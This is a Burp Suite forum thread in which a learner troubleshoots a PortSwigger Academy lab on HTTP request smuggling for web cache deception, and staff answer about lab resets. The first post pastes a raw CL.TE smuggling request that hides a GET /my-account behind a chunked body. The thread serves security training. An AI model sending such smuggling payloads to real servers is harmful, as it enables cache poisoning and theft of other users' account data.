Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Exploiting HTTP request smuggling to perform web cache deception NOT WORKING

kairosdev | Last updated: Sep 09, 2021 07:08PM UTC

I'm trying to solve this challenge with no success. I've typed this code on "Repeater" and send it innumerable times but I can't get a 401 response. POST / HTTP/1.1 Host: ac921f9e1e43510980d00f8c0079000b.web-security-academy.net Content-Type: application/x-www-form-urlencoded Content-Length: 42 Transfer-Encoding: chunked 0 GET /my-account HTTP/1.1 X-Ignore: X Neither I can login as "carlos" and I had to login as "wiener".

Uthman, PortSwigger Agent | Last updated: Sep 10, 2021 04:05PM UTC

Have you tried waiting for the lab to reset before attempting to complete it again?

kairosdev | Last updated: Sep 10, 2021 05:40PM UTC

How long do I have to wait? How do I know it had been reseted?

kairosdev | Last updated: Sep 10, 2021 06:35PM UTC

No problem. I got the solution on this video https://www.youtube.com/watch?v=h2CUQ2wN9OA. If someone has the same problem, this video explain the easier way of doing it, even though you don't have to go back to your Proxy History to see the API Key. You can see it on the "Repeater" response.

Uthman, PortSwigger Agent | Last updated: Sep 13, 2021 08:10AM UTC

Thanks for sharing your findings, Kairos. The labs usually reset after ~15 minutes.

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.